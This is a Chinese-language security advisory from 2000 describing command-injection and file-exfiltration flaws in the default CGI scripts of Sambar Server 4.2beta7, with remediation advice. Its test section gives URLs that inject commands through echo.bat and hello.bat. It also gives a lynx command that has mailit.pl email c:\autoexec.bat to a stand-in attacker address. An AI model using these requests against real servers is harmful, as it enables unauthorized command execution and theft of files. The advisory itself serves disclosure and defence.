发布日期：2000-02-24
更新日期：2000-02-26

受影响系统：

Sambar Server 4.2beta 7以及更低版本
+    Microsoft Windows NT 4.0
     Microsoft Windows 2000

不受影响系统：

Sambar Server 4.2beta 8以及更高版本
+    Microsoft Windows NT 4.0
     Microsoft Windows 2000
     Microsoft Windows 95/98

描述：

---

Sambar Server是一个多线程的HTTP,FTP和Proxy服务器软件,可以用在Windows NT和Windows 9x下。

    Sambar Server缺省安装时会在server的/CGI-BIN目录下放两个.BAT文件: ECHO.BAT和HELLO.BAT.它们都很简单，里面只有个"echo"命令。然而在NT下这两个文件可被利用来执行任意命令.NT下Sambar server通常是以Administrator(管理员)身份启动的，因此即使使用NTFS,你仍然不能避免这个问题。

<* 来源: Georich Chorbadzhiyski(gf@CYBCOM.NET) 和 Nikolay Tsvetkov.  *>

J.A. Gutierrez(spd@GTC1.CPS.UNIZAR.ES)发现在Sambar 4.2缺省安装条件下其cgi-bin下的
mailit.pl程序也可以用来将系统中的敏感文件以附件形式发送给远程攻击者.



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://target/cgi-bin/hello.bat?&dir+c:\
或者
http://target/cgi-bin/echo.bat?&dir+c:\

echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl

建议：

---

暂时删除Sambar server的/CGI-BIN/下的这两个.BAT文件和mailit.pl

下载新版的Sambar 4.2beta8,下载地址是：
http://www.sambar.com/beta.htm

浏览次数：6986
严重程度：0（网友投票）